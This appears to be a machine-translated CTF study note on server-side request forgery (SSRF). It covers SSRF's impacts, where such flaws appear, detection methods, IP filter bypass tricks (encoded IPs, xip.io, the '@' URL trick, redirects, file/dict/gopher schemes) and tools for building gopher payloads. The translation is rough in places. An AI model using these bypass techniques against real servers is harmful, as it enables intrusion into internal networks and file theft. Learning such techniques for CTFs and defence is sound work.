table of Contents
CTF SSRF (server request forgery)
First, the concept
SSRF (Server-Side Request Forgery), a server-side request forgery, counterfeiting exploit server-initiated request to break through the restrictions can not get the client data
Foreign initiated local network requests are loopholes that may exist SSRF
Second, the harm
- 1, can external network, server resides within the network, the local port scan, get some service banner information
- 2, attack run, including network or local applications (such as overflow)
- 3, internal network Web application fingerprinting, by accessing the default file
- 4, Web application attacks inside and outside the network, primarily using the Get parameter can be achieved attacks (such as Struts2 exploits, SQL injection, etc.)
- 5, read the files using the file protocol
Third, the vulnerability mining and judgment
- Looking from the WEB function
- Share: Share web content through a URL address
- Transcoding services: the URL address bar to tune web content to fit the original address of the phone screen browsing
- Translator: URL address translation by the corresponding content of the text.
- And download images load: loaded via the URL or download pictures
- Function undisclosed api achieve and other calls to the URL
- Looking from the URL keywords
- share、wap、url、link、src、source、target、u、3g、display、sourceURL、imageURL、domain
- The basic judgment
- echo
- Direct observation
- Ethereal
- Monitor with vps
- Delay
- DNS requests
- echo
Fourth, the correlation function
file_get_contents
fsockopen
curl_exec
Five, IP bypass
- Add Port
For example:192.168.200.9:80
- Short URL
use 302 Jump to destination URL - Point to any IP domain xip.io
example:10.0.0.1.xip.io resolves to 10.0.0.1
- IP bypass restrictions
- Decimal
- Octal
- Hex
- Different combinations of binary conversion
- 302 Jump
- Combined
dict://
,file://
,gopher://
http://[email protected]
Equivalent tohttp://A.com
the identity of the access 10.10.10.10http://A.com?xxx=xx
Followed by a useless argument to bypass
Six, Gopher protocol
gopher is used to obtain the distribution type of file search on an Internet protocol network
gopher protocol support issue GET, POST request: can first get request packet capture and post request packet, in line with the request constitutes gopher protocol. ssrf use gopher protocol is the most powerful protocol
using the Gopher protocol expanding the attack surface
1. Limitations
(Source see the watermark)
- phpinfo view curl Supported protocols
- No password database
2, structural payload
https://github.com/tarunkant/Gopherus
https://github.com/swisskyrepo/SSRFmap